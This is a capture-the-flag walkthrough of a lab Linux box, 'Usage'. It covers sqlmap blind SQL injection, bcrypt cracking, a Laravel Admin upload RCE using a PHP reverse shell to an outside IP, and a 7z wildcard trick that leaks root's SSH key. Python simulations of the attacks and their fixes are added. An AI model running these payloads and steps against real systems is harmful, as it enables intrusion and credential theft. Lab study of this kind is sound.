Usage
OS: Linux
Difficulty: Easy
Points: 20
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.147.83 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -vvv -p "$ports" -sC -sV -oN nmap.txt 10.129.147.83
Nmap scan report for 10.129.147.83
Host is up, received reset ttl 63 (0.14s latency).
Scanned at 2024-04-15 16:44:25 EDT for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
| 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Browsing the site we find a registration form, a login form and an admin panel served from a separate subdomain, so both names go into /etc/hosts.
echo "10.129.147.83 usage.htb admin.usage.htb" >> /etc/hosts
After several rounds of enumeration of the web application we notice that the password-reset function (/forget-password) is vulnerable to SQL injection.
SQL Injection
Copy the raw request into req.txt so that sqlmap can replay it.
POST /forget-password HTTP/1.1
Host: usage.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
Origin: http://usage.htb
Connection: close
Referer: http://usage.htb/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6InZqaTVuWXltT1hPWVg2cmVhYUUyTVE9PSIsInZhbHVlIjoicWtkVzRRR0I5WDk5VlpROVJvd2wxWExoVEg5ZmR6RmZlSGI0QldPdTU1Tm5taFF1OEpCbVBHU3lvMSt5SHBpeEpBdEh4ZitTV3BjTEtnWUtVTElYS1cvcUpZN2xkUEFERzFnS0drVU5LYmh1Y2NjcEN6SVkzUEdkcEVHNG1FcUoiLCJtYWMiOiIzMGE1YTE1YzU2OGE3NGRlODNlYzRjOTk3ODE5ZGI4MDY4ZTkxZGQyMDE4YzllNzVhMmIyODQwOGQ3ZDM5NWFmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imp0eEhLRmZPSTcyaVZleUh3TjhyYUE9PSIsInZhbHVlIjoiT3ZLdzI4ZXRud3M4NDYwR0luQU5IUVNkb1N5WjZBazZ6R2pqQXFwYm1IMTFmYzhoY2tCV3ZlSXE0UlhuNVZsS1Z2aGFqRGFXTUxBY1RwUXJsMWtVZGdOUk1KWWJhUGc5L2hZNVhWVEdISEVuT0U3RjZpVWNLYnBLdlBnR1E5SmoiLCJtYWMiOiI2ZTZhZWVlODY4MzliNDA4MTBiMjEyMWYyOWViMWU3OTMyYWRiMjg5MTIzZjUyYjE0MjNhZGM1NGMzMjBkNWM5IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1
_token=AlaJuekLpjcxMmkB8sAerfxAQc2HkP3D2XvC5m6e&email=test
Using sqlmap we confirm the injection. The _token value and the laravel_session cookie saved in req.txt must come from the same live session: Laravel validates the CSRF token against the session, and a stale pair is rejected by the CSRF middleware before the query ever runs.
sqlmap -r req.txt -p email --level 3
[17:54:54] [INFO] checking if the injection point on POST parameter 'email' is a false positive
sqlmap identified the following injection point(s) with a total of 390 HTTP(s) requests:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=AlaJuekLpjcxMmkB8sAerfxAQc2HkP3D2XvC5m6e&email=test' AND 9240=(SELECT (CASE WHEN (9240=9240) THEN 9240 ELSE (SELECT 8606 UNION SELECT 9576) END))-- LfWm
---
[17:55:14] [INFO] testing MySQL
[17:55:15] [INFO] confirming MySQL
[17:55:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 8.0.0
[17:55:20] [WARNING] HTTP error codes detected during run:
With the following commands we gather more information: first the current database, then its tables.
sqlmap -r req.txt -p email --current-db
sqlmap -r req.txt -p email -D usage_blog --tables
Database: usage_blog
[8 tables]
+------------------------+
| admin_menu |
| admin_operation_log |
| admin_permissions |
| admin_role_menu |
| admin_role_permissions |
| admin_role_users |
| admin_roles |
| admin_user_permissi |
+------------------------+
Even though we have SQL injection, dumping through it is very slow because the injection is boolean-based blind (one true/false request for every few bits of output). Instead of enumerating every table we look up the schema in the laravel-admin migration on GitHub (see References).
From that migration, and from the admin_* naming above, we can assume there is a table called admin_users with username and password columns.
sqlmap -r req.txt -p email -D usage_blog -T admin_users -C username,password --dump
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+
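To make the "boolean-based blind is slow" point concrete, here is an added example (not code from the writeup, the box, or laravel-admin) that models the vulnerable lookup and recovers the admin hash through a yes/no oracle the way sqlmap does. It runs against an in-memory SQLite database whose schema and sample e-mail address are constructed for the example; the only data taken from the writeup is the admin hash. SQLite's unicode() and substr() stand in for MySQL's ORD() and MID(), and the vulnerable query shape (string concatenation into WHERE email = '...') is an assumption, not the application's real code.

```python
import sqlite3

# The one row the writeup dumped; everything else here is constructed.
ADMIN_HASH = "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2"


def build_db():
    """In-memory stand-in for usage_blog (schema assumed, not taken from the box)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, email TEXT)")
    db.execute("INSERT INTO users(email) VALUES ('user@example.com')")
    db.execute("CREATE TABLE admin_users(username TEXT, password TEXT)")
    db.execute("INSERT INTO admin_users VALUES ('admin', ?)", (ADMIN_HASH,))
    return db


class ForgetPassword:
    """Models /forget-password: returns True when the app would send a reset mail."""

    def __init__(self, db, safe=False):
        self.db, self.safe, self.requests = db, safe, 0

    def __call__(self, email):
        self.requests += 1
        if self.safe:
            # Hardened: bound parameter, the input can only ever be a string literal.
            sql, params = "SELECT id FROM users WHERE email = ?", (email,)
        else:
            # Vulnerable: the email is spliced straight into the SQL text.
            sql, params = f"SELECT id FROM users WHERE email = '{email}'", ()
        return self.db.execute(sql, params).fetchone() is not None


def make_oracle(app):
    """Turn the yes/no reply into a truth oracle for an arbitrary SQL condition."""
    def oracle(cond):
        # 'test' matches no user, so the injected OR branch alone decides the answer.
        return app(f"test' OR ({cond})-- ")
    return oracle


def blind_extract(oracle, subquery, max_len=100):
    """Recover the string a subquery returns, one character per ~7 oracle calls.

    Same idea as sqlmap's boolean-based blind mode: binary search on the
    code point of each character. SQLite's unicode()/substr() play the
    role of MySQL's ORD()/MID().
    """
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({subquery})) >= {pos}"):
            break                               # ran past the end of the value
        lo, hi = 32, 126                        # printable ASCII; bcrypt stays inside it
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo():
    """Dump admin_users.password through the oracle, then show the fix holds."""
    target = "SELECT password FROM admin_users WHERE username = 'admin'"
    vuln = ForgetPassword(build_db())
    recovered = blind_extract(make_oracle(vuln), target)
    fixed = ForgetPassword(build_db(), safe=True)
    return {
        "hash": recovered,
        "requests": vuln.requests,
        "fixed_injectable": fixed("test' OR (1=1)-- "),
    }


if __name__ == "__main__":
    r = demo()
    print(r["hash"])
    print(f"{r['requests']} requests for {len(r['hash'])} characters")
    print("parameterised query still injectable?", r["fixed_injectable"])
```

Recovering the 60-character hash costs several hundred requests even with binary search, which is why guessing admin_users from the migration instead of enumerating every table and column pays off; the parameterised variant returns False for the same payload because the whole string is compared as a literal.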
Crack hash
Now we use john to crack the hash. It is bcrypt ($2y$ prefix, PHP's variant) with cost 10, which john reports as an iteration count of 1024.
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1 (?)
1g 0:00:00:27 DONE (2024-05-09 19:04) 0.03607g/s 58.44p/s 58.44c/s 58.44C/s alexis1..serena
Use the "--show" option to display all of the cracked passwords reliably
Laravel Admin Arbitrary Code Execution (CVE-2023-24249)
We log in to the admin panel and check the dependencies in use and their versions.
Searching for vulnerabilities in those versions leads to the following blog post.
https://flyd.uk/post/cve-2023-24249/
Following the steps in the blog we get RCE: we capture the request sent when uploading an image and modify it so that the file body is the PHP payload below and the filename carries a .php extension.
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.221/1234 0>&1'");?>
Once it has been uploaded we copy the download link and request it; the server executes our command.
With a listener waiting on 10.10.14.221:1234 we get the reverse shell back.
Privilege Escalation
We copy dash's SSH private key so that we can reconnect over SSH more comfortably.
cat /home/dash/.ssh/id_rsa
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# nano dash_rsa
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# chmod 400 dash_rsa
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# ssh -i dash_rsa dash@10.10.11.18
The authenticity of host '10.10.11.18 (10.10.11.18)' can't be established.
Warning: Permanently added '10.10.11.18' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
Last login: Mon Apr 8 12:35:43 2024 from 10.10.14.40
dash@usage:~$ cat user.txt
d32b4c6469f881e2a4f52ad536333604
In the user's home there is an interesting file, .monitrc. It contains the credential for monit's web interface.
dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon 60
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd
That password is reused by the user xander.
xander : 3nc0d3d_pa$$w0rd
dash@usage:~$ su xander
Password:
xander@usage:/home/dash$ cd
xander@usage:~$ id
uid=1001(xander) gid=1001(xander) groups=1001(xander)
The user can run the following command with sudo.
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management
With strings we can get a rough idea of what the binary does.
xander@usage:~$ strings /usr/bin/usage_management
/lib64/ld-linux-x86-64.so.2
...
...
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Error changing working directory to /var/www/html
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql
Password has been reset.
Choose an option:
1. Project Backup
This line is the important one: the binary changes directory to /var/www/html and creates project.zip from whatever the unquoted * expands to in that directory.
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
HackTricks describes exactly this 7z wildcard trick.
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z
We can abuse it because * is expanded by the shell, so an attacker-chosen filename beginning with @ reaches 7z as a list-file argument (-- only ends -switch parsing, not @listfile parsing). -snl makes 7z store symlinks as links instead of following them when archiving, so a bare symlink would not leak its target; a list file, however, is opened and read normally. We therefore create an empty file named @id_rsa and a symlink id_rsa pointing at a root-only file; 7z reads the symlink target as a list of filenames and prints every line in a warning. This needs /var/www/html to be writable by xander, which it is.
xander@usage:/var/www/html$ touch @id_rsa
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa id_rsa
Now we run the program, choose option 1 and read the linked file's contents from the "No more files" warnings: 7z looks for a file named after each line of the key and reports the ones it cannot find.
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz (50657),ASM,AES-NI)
Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54865351
Scanning the drive:
Archive size: 54865924 bytes (53 MiB)
Scan WARNINGS for files and folders:
-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
Each warning is one line of root's private key. Save the seven lines (without the " : No more files" suffix) into root_rsa, chmod 600 it, and connect over SSH.
ssh -i root_rsa root@10.10.11.18
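The escalation above, recreated as an added example that is neither the box's usage_management binary nor 7-Zip's code. It re-implements only the two behaviours that matter: the shell expanding * into the names in the working directory, and 7-Zip treating any argument that starts with @ as a list file whose lines are file names to add, with a "No more files" warning for each name that does not exist. Directories, the placeholder key and the switch handling (switches before --, list files everywhere) are constructed for the example; the real 7-Zip does more, but the leak mechanism is the same.

```python
import os
import tempfile


def shell_expand(cwd, args):
    """Expand a bare '*' the way a POSIX shell does: names in cwd, sorted, no dotfiles."""
    expanded = []
    for a in args:
        if a == "*":
            expanded.extend(sorted(n for n in os.listdir(cwd) if not n.startswith(".")))
        else:
            expanded.append(a)
    return expanded


def seven_zip_collect(cwd, args):
    """Mimic how 7-Zip turns its arguments into paths to add.

    Only the behaviours that matter here are modelled:
      * '-x' arguments before '--' are switches and are ignored,
      * '--' ends switch parsing but NOT list-file parsing,
      * '@name' is a list file: opened (following symlinks), one name per line,
      * a name that does not exist produces a 'No more files' warning that
        echoes the name, which is the leak.
    Returns (names, warnings).
    """
    names, warnings, switches_done = [], [], False
    for a in args:
        if not switches_done and a == "--":
            switches_done = True
        elif not switches_done and a.startswith("-"):
            continue                                   # -tzip, -snl, -mmt, ...
        elif a.startswith("@"):
            with open(os.path.join(cwd, a[1:])) as f:  # follows the symlink
                names.extend(line for line in f.read().splitlines() if line)
        else:
            names.append(a)
    for n in names:
        if not os.path.lexists(os.path.join(cwd, n)):
            warnings.append(f"{n} : No more files")
    return names, warnings


def demo(secret_lines, use_wildcard=True):
    """Recreate the attack in a temp dir; return the warning lines the run prints."""
    with tempfile.TemporaryDirectory() as tmp:
        root_ssh = os.path.join(tmp, "root", ".ssh")   # stands in for /root/.ssh
        www = os.path.join(tmp, "var", "www", "html")  # stands in for /var/www/html
        os.makedirs(root_ssh)
        os.makedirs(www)
        secret = os.path.join(root_ssh, "id_rsa")
        with open(secret, "w") as f:
            f.write("\n".join(secret_lines) + "\n")
        os.chmod(secret, 0o600)
        # The attacker's two steps from the writeup: a file whose name is an
        # '@' option, and a symlink with the name that option refers to.
        open(os.path.join(www, "@id_rsa"), "w").close()
        os.symlink(secret, os.path.join(www, "id_rsa"))
        # What usage_management runs, before and after shell expansion.
        last = "*" if use_wildcard else "."            # '.' is the safe alternative
        argv = shell_expand(www, ["-tzip", "-snl", "-mmt", "--", last])
        _, warnings = seven_zip_collect(www, argv)
        return warnings


def leaked_lines(warnings):
    """Strip the suffix 7-Zip appends, leaving the raw file content."""
    suffix = " : No more files"
    return [w[:-len(suffix)] if w.endswith(suffix) else w for w in warnings]


if __name__ == "__main__":
    key = ["-----BEGIN OPENSSH PRIVATE KEY-----",
           "constructed-placeholder-not-a-real-key",
           "-----END OPENSSH PRIVATE KEY-----"]
    for w in demo(key):
        print(w)
    print("with '.' instead of '*':", demo(key, use_wildcard=False))
```

The check at the end shows the fix: when the program archives . instead of letting the shell expand *, no attacker-chosen filename ever reaches 7-Zip's argument parser, so neither @listfile nor -switch tricks apply. In a real audit the same reasoning applies to any sudo-able wrapper that runs an archiver, find, rsync or tar with an unquoted glob in a directory a less privileged user can write to.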
References
https://github.com/z-song/laravel-admin/blob/master/database/migrations/2016_01_04_173148_create_admin_tables.php
https://flyd.uk/post/cve-2023-24249/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z